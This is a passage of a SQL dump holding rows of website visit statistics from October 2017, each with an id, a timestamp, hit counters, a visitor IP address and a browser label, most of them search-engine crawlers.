,1,1,0,0,'8.29.198.25','other'),(169087,1508631180,1,1,0,0,'51.255.71.126','other'),(169088,1508631283,1,1,0,0,'198.37.118.38','firefox'),(169089,1508631549,1,1,0,0,'51.255.65.76','other'),(169090,1508631895,1,1,0,0,'51.255.71.125','other'),(169091,1508632045,1,1,0,0,'51.255.65.43','other'),(169092,1508632204,1,1,0,0,'217.182.132.24','other'),(169093,1508632256,1,1,0,0,'213.180.203.7','other'),(169094,1508632580,1,1,0,0,'178.154.200.28','other'),(169095,1508633124,1,1,0,0,'217.182.132.171','other'),(169096,1508633302,1,1,0,0,'51.255.65.11','other'),(169097,1508633314,1,0,1,0,'66.249.64.29',''),(169098,1508633678,1,1,0,0,'217.182.132.32','other'),(169099,1508633680,1,1,0,0,'51.255.65.73','other'),(169100,1508633730,1,1,0,0,'51.255.65.17','other'),(169101,1508633984,7,7,0,0,'5.9.155.37','other'),(169102,1508634113,1,1,0,0,'217.182.132.31','other'),(169103,1508634157,1,1,0,0,'137.74.201.99','other'),(169104,1508634312,5,5,0,0,'142.4.200.37','other'),(169105,1508635171,1,1,0,0,'51.255.65.64','other'),(169106,1508635651,1,1,0,0,'151.80.27.116','other'),(169107,1508635702,1,1,0,0,'51.255.65.82','other'),(169108,1508636696,1,1,0,0,'176.31.231.10','other'),(169109,1508637144,1,1,0,0,'37.9.113.110','other'),(169110,1508637373,1,1,0,0,'217.182.132.172','other'),(169111,1508638055,1,1,0,0,'217.182.132.148','other'),(169112,1508638424,1,1,0,0,'51.255.65.32','other'),(169113,1508638827,1,1,0,0,'51.255.65.66','other'),(169114,1508639102,1,1,0,0,'207.46.13.100','other'),(169115,1508639389,1,1,0,0,'217.182.132.25','other'),(169116,1508639583,1,1,0,0,'51.255.65.33','other'),(169117,1508639585,1,1,0,0,'51.255.65.54','other'),(169118,1508640274,1,1,0,0,'51.255.71.128','other'),(169119,1508640743,1,1,0,0,'217.182.132.149','other'),(169120,1508640772,1,1,0,0,'51.255.65.39','other'),(169121,1508641523,1,1,0,0,'51.255.65.26','other'),(169122,1508641994,1,1,0,0,'8.29.198.26','other'),(169123,1508642133,1,1,0,0,'217.182.132.186','other'),(169124,1508642744,1,1,0,0,'66.249.64.30','chrome'),(169125,1508642900,1,1,0,0,'217.182.132.183','other'),(169126,1508643245,1,1,0,0,'51.255.71.98','other'),(169127,1508643295,1,1,0,0,'217.182.132.65','other'),(169128,1508643470,1,1,0,0,'51.255.65.55','other'),(169129,1508643562,1,1,0,0,'180.76.15.12','other'),(169130,1508644012,1,1,0,0,'128.68.223.155','msie'),(169131,1508644345,1,1,0,0,'217.182.132.183','other'),(169132,1508644524,1,1,0,0,'51.255.65.49','other'),(169133,1508645403,1,1,0,0,'51.255.65.31','other'),(169134,1508645515,1,1,0,0,'217.182.132.94','other'),(169135,1508645717,1,1,0,0,'51.255.64.106','other'),(169136,1508646279,1,1,0,0,'51.255.65.67','other'),(169137,1508646287,1,1,0,0,'217.182.132.176','other'),(169138,1508646420,1,1,0,0,'217.182.132.97','other'),(169139,1508646534,1,1,0,0,'217.182.132.58','other'),(169140,1508647140,1,1,0,0,'51.255.65.44','other'),(169141,1508647592,1,1,0,0,'217.182.132.80','other'),(169142,1508647763,1,1,0,0,'51.255.65.20','other'),(169143,1508647919,1,1,0,0,'217.182.132.91','other'),(169144,1508648635,1,1,0,0,'157.55.39.187','other'),(169145,1508648783,1,1,0,0,'77.243.183.162','chrome'),(169146,1508648796,1,1,0,0,'51.255.65.21','other'),(169147,1508648923,1,1,0,0,'51.255.71.119','other'),(169148,1508649556,1,1,0,0,'51.255.65.29','other'),(169149,1508649960,1,1,0,0,'51.255.65.15','other'),(169150,1508650820,15,15,0,0,'173.249.1.37','other'),(169151,1508650839,1,1,0,0,'51.255.65.91','other'),(169152,1508651152,1,1,0,0,'37.9.113.110','other'),(169153,1508651679,1,1,0,0,'37.9.113.157','other'),(169154,1508651683,1,1,0,0,'37.9.113.134','other'),(169155,1508651778,1,1,0,0,'91.196.178.35','chrome'),(169156,1508651885,1,1,0,0,'51.255.65.81','other'),(169157,1508652472,1,1,0,0,'217.69.133.9','other'),(169158,1508652478,1,0,1,0,'66.249.64.30',''),(169159,1508652820,1,1,0,0,'8.29.198.27','other'),(169160,1508652877,1,1,0,0,'51.255.65.6','other'),(169161,1508652892,1,1,0,0,'51.255.65.29','other'),(169162,1508652983,4,4,0,0,'5.9.111.70','other'),(169163,1508653386,1,1,0,0,'217.182.132.16','other'),(169164,1508654204,1,1,0,0,'51.255.65.95','other'),(169165,1508654298,1,1,0,0,'51.255.65.7','other'),(169166,1508654562,1,1,0,0,'217.182.132.93','other'),(169167,1508654740,1,1,0,0,'217.182.132.85','other'),(169168,1508655020,1,1,0,0,'178.154.171.81','other'),(169169,1508655033,1,1,0,0,'217.182.132.176','other'),(169170,1508655328,1,1,0,0,'137.74.207.116','other'),(169171,1508656072,1,1,0,0,'217.182.132.188','other'),(169172,1508656520,1,1,0,0,'51.255.65.40','other'),(169173,1508656586,1,1,0,0,'157.55.39.187','other'),(169174,1508656827,1,1,0,0,'217.182.132.179','other'),(169175,1508657519,1,1,0,0,'66.249.70.29','chrome'),(169176,1508657552,1,1,0,0,'216.244.66.237','other'),(169177,1508658010,1,1,0,0,'51.255.65.94','other'),(169178,1508659173,1,1,0,0,'137.74.207.170','other'),(169179,1508659364,1,1,0,0,'51.255.65.43','other'),(169180,1508660168,1,1,0,0,'91.196.178.35','chrome'),(169181,1508662110,1,1,0,0,'137.74.207.120','other'),(169182,1508662524,1,1,0,0,'51.255.64.106','other'),(169183,1508662622,1,1,0,0,'51.255.65.56','other'),(169184,1508663178,1,1,0,0,'204.79.180.5','msie'),(169185,1508663321,1,0,1,0,'66.249.70.27',''),(169186,1508663550,1,1,0,0,'37.9.113.115','other'),(169187,1508663643,1,1,0,0,'8.29.198.25','other'),(169188,1508663705,1,1,0,0,'51.255.71.115','other'),(169189,1508663912,1,0,1,0,'66.249.64.28',''),(169190,1508664061,1,1,0,0,'51.255.65.43','other'),(169191,1508664161,1,1,0,0,'51.255.65.64','other'),(169192,1508664180,1,0,1,0,'66.249.64.30',''),(169193,1508664256,1,1,0,0,'51.255.65.29','other'),(169194,1508664370,1,1,0,0,'162.210.196.129','other'),(169195,1508664877,2,2,0,0,'95.10.185.17','other'),(169196,1508664964,1,1,0,0,'91.209.11.236','other'),(169197,1508665403,1,1,0,0,'217.182.132.175','other'),(169198,1508665908,1,1,0,0,'217.182.132.181','other'),(169199,1508666187,1,1,0,0,'207.46.13.163','other'),(169200,1508666361,1,1,0,0,'217.182.132.94','other'),(169201,1508666648,1,1,0,0,'217.182.132.156','other'),(169202,1508667064,1,1,0,0,'157.55.39.187','other'),(169203,1508667129,1,1,0,0,'51.255.65.2','other'),(169204,1508667639,1,1,0,0,'51.255.65.39','other'),(169205,1508667772,1,1,0,0,'217.182.132.73','other'),(169206,1508668111,1,1,0,0,'51.255.65.94','other'),(169207,1508668140,1,1,0,0,'87.250.224.46','other'),(169208,1508668554,1,1,0,0,'176.31.231.10','other'),(169209,1508668588,1,1,0,0,'217.69.133.215','other'),(169210,1508668734,1,1,0,0,'164.132.162.155','other'),(169211,1508668836,1,1,0,0,'217.69.133.4','other'),(169212,1508669031,1,0,1,0,'66.249.70.27',''),(169213,1508669099,1,1,0,0,'180.76.15.12','other'),(169214,1508669831,1,1,0,0,'51.255.65.10','other'),(169215,1508670195,1,1,0,0,'51.255.71.114','other'),(169216,1508670215,1,1,0,0,'217.182.132.56','other'),(169217,1508670686,1,1,0,0,'51.255.65.42','other'),(169218,1508671287,1,1,0,0,'217.182.132.58','other'),(169219,1508671798,1,1,0,0,'66.249.70.27','chrome'),(169220,1508671822,1,1,0,0,'66.249.64.28','chrome'),(169221,1508672017,1,1,0,0,'95.28.192.230','msie'),(169222,1508672068,1,1,0,0,'137.74.201.108','other'),(169223,1508672203,1,1,0,0,'91.196.178.129','other'),(169224,1508672306,1,1,0,0,'157.55.39.187','other'),(169225,1508672371,1,1,0,0,'217.69.133.6','other'),(169226,1508672394,1,1,0,0,'93.170.114.133','firefox'),(169227,1508672642,1,1,0,0,'217.182.132.64','other'),(169228,1508672823,1,1,0,0,'163.172.255.19','chrome'),(169229,1508673403,1,1,0,0,'51.255.65.34','other'),(169230,1508673570,1,1,0,0,'217.182.132.28','other'),(169231,1508673873,1,1,0,0,'157.55.39.187','other'),(169232,1508673919,1,1,0,0,'217.182.132.157','other'),(169233,1508674115,1,1,0,0,'217.182.132.80','other'),(169234,1508674467,1,1,0,0,'8.29.198.27','other'),(169235,1508674579,1,1,0,0,'217.182.132.184','other'),(169236,1508674893,1,1,0,0,'137.74.207.114','other'),(169237,1508676048,5,5,0,0,'46.229.168.74','other'),(169238,1508676064,5,5,0,0,'46.229.168.73','other'),(169239,1508676069,1,0,1,0,'66.249.64.28',''),(169240,1508676081,6,6,0,0,'46.229.168.76','other'),(169241,1508676155,5,5,0,0,'46.229.168.72','other'),(169242,1508676169,2,2,0,0,'173.234.159.250','other'),(169243,1508676196,6,6,0,0,'46.229.168.80','other'),(169244,1508676247,6,6,0,0,'46.229.168.79','other'),(169245,1508676262,6,6,0,0,'46.229.168.65','other'),(169246,1508676310,3,3,0,0,'46.229.168.77','other'),(169247,1508676363,5,5,0,0,'46.229.168.66','other'),(169248,1508676418,1,1,0,0,'157.55.39.236','other'),(169249,1508676444,1,1,0,0,'46.229.168.67','other'),(169250,1508676463,3,3,0,0,'46.229.168.71','other'),(169251,1508676499,8,8,0,0,'46.229.168.68','other'),(169252,1508676567,3,3,0,0,'46.229.168.78','other'),(169253,1508676653,3,3,0,0,'46.229.168.69','other'),(169254,1508676912,5,5,0,0,'46.229.168.70','other'),(169255,1508676961,8,8,0,0,'46.229.168.74','other'),(169256,1508677023,3,3,0,0,'46.229.168.73','other'),(169257,1508677160,4,4,0,0,'46.229.168.72','other'),(169258,1508677170,10,10,0,0,'46.229.168.79','other'),(169259,1508677240,6,6,0,0,'46.229.168.77','other'),(169260,1508677339,6,6,0,0,'46.229.168.76','other'),(169261,1508677379,5,5,0,0,'46.229.168.71','other'),(169262,1508677433,5,5,0,0,'46.229.168.68','other'),(169263,1508677492,3,3,0,0,'46.229.168.65','other'),(169264,1508677494,1,1,0,0,'51.255.65.36','other'),(169265,1508677723,6,6,0,0,'46.229.168.67','other'),(169266,1508677766,2,2,0,0,'46.229.168.66','other'),(169267,1508677778,4,4,0,0,'46.229.168.69','other'),(169268,1508677815,1,1,0,0,'51.255.65.23','other'),(169269,1508677927,3,3,0,0,'46.229.168.80','other'),(169270,1508678017,2,2,0,0,'46.229.168.78','other'),(169271,1508678067,7,7,0,0,'46.229.168.74','other'),(169272,1508678122,4,4,0,0,'46.229.168.72','other'),(169273,1508678136,5,5,0,0,'46.229.168.79','other'),(169274,1508678173,5,5,0,0,'46.229.168.70','other'),(169275,1508678245,3,3,0,0,'46.229.168.76','other'),(169276,1508678297,4,4,0,0,'46.229.168.73','other'),(169277,1508678320,3,3,0,0,'46.229.168.77','other'),(169278,1508678448,7,7,0,0,'46.229.168.68','other'),(169279,1508678556,1,1,0,0,'51.255.65.35','other'),(169280,1508678656,1,1,0,0,'37.9.113.182','other'),(169281,1508678697,3,3,0,0,'46.229.168.67','other'),(169282,1508678755,1,1,0,0,'217.182.132.75','other'),(169283,1508678771,5,5,0,0,'46.229.168.69','other'),(169284,1508678867,7,7,0,0,'46.229.168.71','other'),(169285,1508678878,4,4,0,0,'46.229.168.80','other'),(169286,1508679042,2,2,0,0,'46.229.168.65','other'),(169287,1508679079,8,8,0,0,'46.229.168.79','other'),(169288,1508679140,5,5,0,0,'46.229.168.74','other'),(169289,1508679169,1,1,0,0,'46.229.168.75','other'),(169290,1508679177,6,6,0,0,'46.229.168.76','other'),(169291,1508679323,4,4,0,0,'46.229.168.77','other'),(169292,1508679370,2,2,0,0,'46.229.168.73','other'),(169293,1508679395,4,4,0,0,'46.229.168.66','other'),(169294,1508679412,4,4,0,0,'46.229.168.70','other'),(169295,1508679433,1,1,0,0,'46.229.168.78','other'),(169296,1508679457,52,52,0,0,'54.158.55.5','other'),(169297,1508679519,3,3,0,0,'46.229.168.72','other'),(169298,1508679654,1,1,0,0,'217.182.132.70','other'),(169299,1508679777,6,6,0,0,'46.229.168.71','other'),(169300,1508679825,1,1,0,0,'46.229.168.69','other'),(169301,1508679845,6,6,0,0,'46.229.168.68','other'),(169302,1508679909,1,1,0,0,'164.132.162.156','other'),(169303,1508680044,6,6,0,0,'46.229.168.67','other'),(169304,1508680103,1,1,0,0,'51.255.65.3','other'),(169305,1508680119,6,6,0,0,'46.229.168.80','other'),(169306,1508680183,1,1,0,0,'51.255.65.75','other'),(169307,1508680188,7,7,0,0,'46.229.168.74','other'),(169308,1508680206,1,1,0,0,'46.229.168.75','other'),(169309,1508680211,8,8,0,0,'46.229.168.76','other'),(169310,1508680246,6,6,0,0,'46.229.168.79','other'),(169311,1508680321,6,6,0,0,'46.229.168.65','other'),(169312,1508680359,34,34,0,0,'54.158.55.5','other'),(169313,1508680430,3,3,0,0,'46.229.168.73','other'),(169314,1508680494,3,3,0,0,'46.229.168.66','other'),(169315,1508680648,10,10,0,0,'46.229.168.78','other'),(169316,1508680758,1,1,0,0,'91.209.11.236','other'),(169317,1508680835,3,3,0,0,'46.229.168.70','other'),(169318,1508680866,1,1,0,0,'51.255.71.121','other'),(169319,1508680974,2,2,0,0,'46.229.168.68','other'),(169320,1508681019,1,0,1,0,'66.249.64.28',''),(169321,1508681099,1,1,0,0,'37.9.113.157','other'),(169322,1508681174,1,1,0,0,'46.229.168.72','other'),(169323,1508681327,1,1,0,0,'51.255.65.38','other'),(169324,1508681762,1,1,0,0,'217.182.132.88','other'),(169325,1508681779,1,1,0,0,'51.255.71.122','other'),(169326,1508681822,1,1,0,0,'74.115.214.131','other'),(169327,1508681840,1,1,0,0,'51.255.65.79','other'),(169328,1508682086,1,1,0,0,'91.209.11.236','other'),(169329,1508682654,1,1,0,0,'51.255.65.92','other'),(169330,1508683008,1,1,0,0,'67.215.230.93','other'),(169331,1508683668,1,1,0,0,'51.255.65.9','other'),(169332,1508684284,1,1,0,0,'51.255.65.90','other'),(169333,1508684287,1,0,1,0,'66.249.70.27',''),(169334,1508684546,16,16,0,0,'142.4.200.37','other'),(169335,1508685067,1,0,1,0,'66.249.64.29',''),(169336,1508685233,1,1,0,0,'217.69.133.5','other'),(169337,1508685295,1,1,0,0,'137.74.207.161','other'),(169338,1508685298,1,1,0,0,'8.29.198.26','other'),(169339,1508685569,1,1,0,0,'217.182.132.191','other'),(169340,1508686583,1,1,0,0,'178.94.172.79','other'),(169341,1508686662,1,1,0,0,'51.255.71.125','other'),(169342,1508686715,1,1,0,0,'217.182.132.29','other'),(169343,1508686983,1,1,0,0,'216.244.66.237','other'),(169344,1508687387,1,0,1,0,'66.249.70.25',''),(169345,1508687748,1,1,0,0,'37.9.113.132','other'),(169346,1508687922,1,1,0,0,'164.132.162.154','other'),(169347,1508688697,1,1,0,0,'37.57.185.101','chrome'),(169348,1508688803,2,0,2,0,'66.249.70.27',''),(169349,1508689025,1,1,0,0,'137.74.207.159','other'),(169350,1508689816,1,1,0,0,'37.9.113.100','other'),(169351,1508690293,1,1,0,0,'213.180.203.8','other'),(169352,1508690659,1,1,0,0,'37.9.113.138','other'),(169353,1508690660,1,1,0,0,'5.45.207.49','other'),(169354,1508690723,1,1,0,0,'217.182.132.28','other'),(169355,1508690789,1,1,0,0,'91.196.178.131','other'),(169356,1508690790,1,1,0,0,'91.196.178.131','msie'),(169357,1508690792,1,1,0,0,'91.196.178.131','chrome'),(169358,1508690893,1,1,0,0,'51.255.71.123','other'),(169359,1508691303,1,1,0,0,'217.182.132.65','other'),(169360,1508691446,1,1,0,0,'5.45.207.83','other'),(169361,1508691640,1,1,0,0,'62.122.182.106','chrome'),(169362,1508691706,1,1,0,0,'51.255.71.119','other'),(169363,1508691815,1,1,0,0,'66.249.64.29','chrome'),(169364,1508691975,2,2,0,0,'178.154.171.88','other'),(169365,1508692090,1,1,0,0,'91.196.178.35','chrome'),(169366,1508692186,1,1,0,0,'91.196.178.131','other'),(169368,1508692217,1,1,0,0,'91.196.178.131','msie'),(169369,1508692218,1,1,0,0,'91.196.178.131','chrome'),(169370,1508692688,1,1,0,0,'91.196.178.37','chrome'),(169371,1508692878,1,1,0,0,'141.8.132.19','other'),(169372,1508692898,1,1,0,0,'163.172.255.19','chrome'),(169373,1508693107,1,1,0,0,'37.73.248.95','chrome'),(169374,1508693253,1,0,1,0,'66.249.64.30',''),(169375,1508693265,1,1,0,0,'217.182.132.80','other'),(169376,1508694324,1,1,0,0,'141.8.142.74','other'),(169377,1508694603,1,1,0,0,'51.255.65.24','other'),(169378,1508694659,1,1,0,0,'87.250.224.46','other'),(169379,1508694682,1,1,0,0,'51.255.65.23','other'),(169380,1508695102,1,1,0,0,'51.255.65.44','other'),(169381,1508695440,1,1,0,0,'178.154.171.81','other'),(169382,1508696129,1,1,0,0,'8.29.198.26','other'),(169383,1508696214,1,1,0,0,'217.182.132.33','other'),(169384,1508696270,1,1,0,0,'51.255.65.36','other'),(169385,1508696620,1,1,0,0,'157.55.39.187','other'),(169386,1508696776,1,1,0,0,'141.8.142.74','other'),(169387,1508696794,1,1,0,0,'51.255.65.16','other'),(169388,1508697251,1,1,0,0,'151.80.27.118','other'),(169389,1508698208,1,1,0,0,'217.182.132.175','other'),(169390,1508698439,1,1,0,0,'51.255.65.31','other'),(169391,1508699129,1,1,0,0,'37.9.113.138','other'),(169392,1508699705,1,1,0,0,'137.74.207.164','other'),(169393,1508700290,1,0,1,0,'68.180.229.52',''),(169394,1508700385,1,1,0,0,'87.250.224.46','other'),(169395,1508700596,1,1,0,0,'217.182.132.149','other'),(169396,1508701020,1,0,1,0,'66.249.64.30',''),(169397,1508701655,1,1,0,0,'151.80.27.118','other'),(169398,1508702274,1,1,0,0,'51.255.65.66','other'),(169399,1508702425,1,1,0,0,'217.182.132.88','other'),(169400,1508702777,1,1,0,0,'178.154.171.88','other'),(169401,1508702979,1,1,0,0,'217.182.132.179','other'),(169402,1508703043,1,0,1,0,'66.249.64.30',''),(169403,1508703394,1,1,0,0,'217.182.132.64','other'),(169404,1508704853,1,1,0,0,'157.55.39.187','other'),(169405,1508705282,1,1,0,0,'51.255.65.88','other'),(169406,1508706545,1,1,0,0,'51.255.65.26','other'),(169407,1508706650,1,1,0,0,'217.182.132.79','other'),(169408,1508706836,1,1,0,0,'217.182.132.172','other'),(169409,1508707085,1,1,0,0,'217.69.133.194','other'),(169410,1508707173,1,1,0,0,'88.99.135.116','other'),(169411,1508707347,1,1,0,0,'141.8.142.74','other'),(169412,1508707403,1,1,0,0,'65.19.138.34','other'),(169413,1508707721,1,1,0,0,'164.132.162.158','other'),(169414,1508707891,1,0,1,0,'66.249.64.29',''),(169415,1508708377,1,1,0,0,'217.182.132.64','other'),(169416,1508709347,1,1,0,0,'51.255.65.45','other'),(169417,1508709858,1,1,0,0,'134.249.50.8','firefox'),(169418,1508710026,1,1,0,0,'217.182.132.241','other'),(169419,1508710101,1,1,0,0,'95.132.7.240','chrome'),(169420,1508710284,1,1,0,0,'51.255.65.83','other'),(169421,1508711661,1,1,0,0,'217.182.132.25','other'),(169422,1508711723,1,1,0,0,'217.182.132.63','other'),(169423,1508711774,1,1,0,0,'51.255.65.13','other'),(169424,1508711812,1,0,1,0,'66.249.70.25',''),(169425,1508712131,1,1,0,0,'51.255.71.133','other'),(169426,1508712177,2,2,0,0,'51.255.65.51','other'),(169427,1508712477,1,1,0,0,'51.255.65.90','other'),(169428,1508713366,1,1,0,0,'51.255.71.110','other'),(169429,1508713770,1,1,0,0,'217.182.132.30','other'),(169430,1508715082,1,1,0,0,'51.255.65.85','other'),(169431,1508715293,1,0,1,0,'66.249.64.30',''),(169432,1508715392,1,1,0,0,'157.55.39.187','other'),(169433,1508715437,1,1,0,0,'51.255.65.14','other'),(169434,1508715686,1,1,0,0,'51.255.65.52','other'),(169435,1508715857,1,1,0,0,'51.255.65.90','other'),(169436,1508716075,1,1,0,0,'217.69.133.4','other'),(169437,1508716114,1,0,1,0,'66.249.64.29',''),(169438,1508716160,1,1,0,0,'164.132.162.164','other'),(169439,1508716381,1,1,0,0,'217.182.132.149','other'),(169440,1508716558,1,1,0,0,'51.255.65.79','other'),(169441,1508716615,1,1,0,0,'51.255.71.112','other'),(169442,1508716960,1,1,0,0,'66.249.70.27','chrome'),(169443,1508717012,1,1,0,0,'217.182.132.62','other'),(169444,1508717130,1,1,0,0,'51.255.65.18','other'),(169445,1508717406,1,1,0,0,'217.182.132.29','other'),(169446,1508717477,1,0,1,0,'66.249.64.30',''),(169447,1508717645,1,1,0,0,'217.182.132.76','other'),(169448,1508717806,1,1,0,0,'217.182.132.87','other'),(169449,1508717809,1,1,0,0,'217.182.132.176','other'),(169450,1508717877,1,1,0,0,'51.255.65.32','other'),(169451,1508718202,1,1,0,0,'217.182.132.77','other'),(169452,1508718203,1,1,0,0,'51.255.65.42','other'),(169453,1508718237,1,1,0,0,'8.29.198.26','other'),(169454,1508718383,1,1,0,0,'178.154.171.88','other'),(169455,1508718744,1,1,0,0,'217.182.132.188','other'),(169456,1508718758,1,0,1,0,'66.249.64.30',''),(169457,1508719982,1,1,0,0,'217.182.132.93','other'),(169458,1508720464,1,1,0,0,'217.182.132.20','other'),(169459,1508720525,1,1,0,0,'217.182.132.55','other'),(169460,1508720918,1,1,0,0,'66.249.64.30','chrome'),(169461,1508721479,1,1,0,0,'178.159.37.105','chrome'),(169462,1508721601,1,1,0,0,'217.182.132.86','other'),(169463,1508722115,1,1,0,0,'217.182.132.151','other'),(169464,1508722188,1,1,0,0,'137.74.201.108','other'),(169465,1508722329,1,1,0,0,'51.255.65.26','other'),(169466,1508722427,1,1,0,0,'51.255.65.5','other'),(169467,1508722566,1,1,0,0,'137.74.207.161','other'),(169468,1508723823,1,1,0,0,'51.255.65.45','other'),(169469,1508724909,1,1,0,0,'137.74.203.194','other'),(169470,1508726201,1,1,0,0,'217.182.132.59','other'),(169471,1508726648,1,1,0,0,'51.255.71.101','other'),(169472,1508727093,1,1,0,0,'51.255.65.96','other'),(169473,1508727200,1,1,0,0,'217.182.132.29','other'),(169474,1508727474,2,2,0,0,'217.182.132.174','other'),(169475,1508728474,1,0,1,0,'66.249.70.27',''),(169476,1508728483,1,1,0,0,'216.244.66.237','other'),(169477,1508728613,1,1,0,0,'51.255.65.77','other'),(169478,1508728957,1,1,0,0,'137.74.207.116','other'),(169479,1508729069,1,1,0,0,'8.29.198.26','other'),(169480,1508729908,1,1,0,0,'66.249.70.27','chrome'),(169481,1508729931,1,1,0,0,'51.255.65.78','other'),(169482,1508730053,1,1,0,0,'66.249.64.29','chrome'),(169483,1508730350,1,1,0,0,'137.74.201.108','other'),(169484,1508730513,1,0,1,0,'66.249.70.29',''),(169485,1508731066,1,1,0,0,'51.255.65.18','other'),(169486,1508731140,1,1,0,0,'51.255.65.90','other'),(169487,1508731717,1,1,0,0,'51.255.65.31','other'),(169488,1508732216,1,1,0,0,'51.255.71.116','other'),(169489,1508732383,17,17,0,0,'69.30.198.202','other'),(169490,1508732489,1,1,0,0,'51.255.65.87','other'),(169491,1508732500,1,0,1,0,'66.249.64.29',''),(169492,1508732511,1,1,0,0,'217.69.133.6','other'),(169493,1508732615,1,1,0,0,'217.182.132.87','other'),(169494,1508733022,1,1,0,0,'207.46.13.50','other'),(169495,1508733153,1,1,0,0,'217.182.132.67','other'),(169496,1508733231,1,1,0,0,'217.182.132.188','other'),(169497,1508733523,1,1,0,0,'66.102.9.27','chrome'),(169498,1508733615,1,1,0,0,'51.255.65.90','other'),(169499,1508733763,1,1,0,0,'66.249.70.27','chrome'),(169500,1508734108,1,1,0,0,'216.244.66.237','other'),(169501,1508734387,1,1,0,0,'198.37.118.38','firefox'),(169502,1508734627,1,1,0,0,'180.76.15.6','other'),(169503,1508734747,1,1,0,0,'51.255.65.23','other'),(169504,1508734799,1,1,0,0,'5.133.11.142','firefox'),(169505,1508734850,2,2,0,0,'185.11.247.159','chrome'),(169506,1508735651,1,0,1,0,'66.249.70.29',''),(169507,1508736360,1,1,0,0,'51.255.65.59','other'),(169508,1508736401,1,1,0,0,'51.255.65.39','other'),(169509,1508737238,1,1,0,0,'91.196.178.69','chrome'),(169510,1508738529,2,2,0,0,'91.196.178.71','chrome'),(169511,1508738565,1,0,1,0,'66.249.64.29',''),(169512,1508738676,1,1,0,0,'51.255.71.127','other'),(169513,1508738984,1,1,0,0,'91.196.179.138','chrome'),(169514,1508739323,1,1,0,0,'217.182.132.36','other'),(169515,1508739687,1,1,0,0,'91.196.178.71','chrome'),(169516,1508739839,1,1,0,0,'178.154.171.88','other'),(169517,1508739901,1,1,0,0,'8.29.198.27','other'),(169518,1508739981,1,1,0,0,'217.182.132.149','other'),(169519,1508740352,1,1,0,0,'91.196.177.46','firefox'),(169520,1508740390,1,1,0,0,'51.255.65.81','other'),(169521,1508740645,1,1,0,0,'217.182.132.6','other'),(169522,1508740768,1,1,0,0,'92.112.4.108','chrome'),(169523,1508740904,1,1,0,0,'188.163.16.6','chrome'),(169524,1508741118,1,1,0,0,'91.196.178.165','chrome'),(169525,1508741228,1,1,0,0,'217.182.132.84','other'),(169526,1508741274,1,1,0,0,'217.182.132.150','other'),(169527,1508741581,1,1,0,0,'91.196.177.15','chrome'),(169528,1508742564,1,1,0,0,'178.154.171.88','other'),(169529,1508742653,1,1,0,0,'95.132.1.137','firefox'),(169530,1508742990,1,1,0,0,'217.182.132.5','other'),(169531,1508743031,1,0,1,0,'66.249.70.29',''),(169532,1508743584,1,1,0,0,'91.196.178.99','chrome'),(169533,1508743633,1,1,0,0,'217.69.133.194','other'),(169534,1508743864,1,1,0,0,'217.182.132.14','other'),(169535,1508744210,1,1,0,0,'91.196.178.164','chrome'),(169536,1508744299,1,1,0,0,'217.182.132.95','other'),(169537,1508744530,1,1,0,0,'66.249.64.29','chrome'),(169538,1508744552,1,1,0,0,'66.249.70.29','chrome'),(169539,1508744741,1,1,0,0,'91.196.179.33','firefox'),(169540,1508745354,1,1,0,0,'137.74.201.100','other'),(169541,1508745423,1,1,0,0,'51.255.65.27','other'),(169542,1508745702,1,1,0,0,'51.255.65.6','other'),(169543,1508746087,1,1,0,0,'51.255.71.129','other'),(169544,1508746211,1,0,1,0,'66.249.64.29',''),(169545,1508746215,2,2,0,0,'95.213.141.126','opera'),(169546,1508746229,1,1,0,0,'91.196.178.65','firefox'),(169547,1508746262,1,1,0,0,'157.55.39.187','other'),(169548,1508746388,1,1,0,0,'51.255.65.32','other'),(169549,1508746561,1,1,0,0,'54.165.59.7','other'),(169550,1508746877,1,1,0,0,'66.249.70.25','chrome'),(169551,1508746921,2,2,0,0,'94.154.239.69','other'),(169552,1508747058,1,1,0,0,'137.74.207.101','other'),(169553,1508747397,1,1,0,0,'91.196.178.33','chrome'),(169554,1508747613,1,0,1,0,'66.249.64.29',''),(169555,1508747801,1,1,0,0,'198.37.118.38','firefox'),(169556,1508747881,1,1,0,0,'217.182.132.86','other'),(169557,1508748026,1,1,0,0,'91.196.178.70','firefox'),(169558,1508748073,1,1,0,0,'217.182.132.17','other'),(169559,1508748107,1,1,0,0,'91.196.178.71','chrome'),(169560,1508748245,1,1,0,0,'107.167.105.177','other'),(169561,1508748958,1,1,0,0,'217.69.133.203','other'),(169562,1508749172,1,1,0,0,'217.182.132.37','other'),(169563,1508749268,1,1,0,0,'5.133.11.137','chrome'),(169564,1508749721,2,0,2,0,'66.249.70.27',''),(169565,1508749743,1,0,1,0,'66.249.64.30',''),(169566,1508750060,1,1,0,0,'82.145.221.249','chrome'),(169567,1508750239,1,1,0,0,'178.154.171.88','other'),(169568,1508750732,1,1,0,0,'8.29.198.25','other'),(169569,1508750750,1,1,0,0,'37.144.82.10','msie'),(169570,1508750842,1,1,0,0,'185.137.18.38','chrome'),(169571,1508751253,1,1,0,0,'91.196.178.162','chrome'),(169572,1508751677,1,1,0,0,'51.255.71.133','other'),(169573,1508752043,1,1,0,0,'51.255.65.14','other'),(169574,1508752099,1,1,0,0,'176.193.185.130','msie'),(169575,1508752101,1,1,0,0,'188.32.132.1','msie'),(169576,1508752199,1,1,0,0,'51.255.65.75','other'),(169577,1508752541,1,1,0,0,'91.196.178.65','chrome'),(169578,1508752584,1,1,0,0,'37.55.225.46','chrome'),(169579,1508752991,1,1,0,0,'217.182.132.83','other'),(169580,1508753091,1,1,0,0,'51.255.65.96','other'),(169581,1508753315,1,0,1,0,'66.249.70.29',''),(169582,1508753374,2,2,0,0,'66.249.70.25','chrome'),(169583,1508753381,1,0,1,0,'66.249.64.29',''),(169584,1508753410,1,0,1,0,'66.249.70.27',''),(169585,1508753414,1,1,0,0,'66.249.64.30','chrome'),(169586,1508753420,1,0,1,0,'66.249.64.28',''),(169587,1508753468,1,1,0,0,'217.182.132.155','other'),(169588,1508754078,1,1,0,0,'217.182.132.82','other'),(169589,1508754335,1,1,0,0,'178.154.171.88','other'),(169590,1508754539,1,1,0,0,'51.255.65.61','other'),(169591,1508755786,1,1,0,0,'217.182.132.96','other'),(169592,1508756407,1,1,0,0,'217.182.132.185','other'),(169593,1508756546,1,1,0,0,'51.255.65.8','other'),(169594,1508756920,1,1,0,0,'178.154.171.88','other'),(169595,1508757571,1,1,0,0,'51.255.65.24','other'),(169596,1508757659,1,1,0,0,'217.182.132.84','other'),(169597,1508757876,1,1,0,0,'91.196.178.164','chrome'),(169598,1508758644,1,1,0,0,'51.255.65.41','other'),(169599,1508758801,1,1,0,0,'51.255.65.59','other'),(169600,1508758931,1,1,0,0,'51.255.65.5','other'),(169601,150875930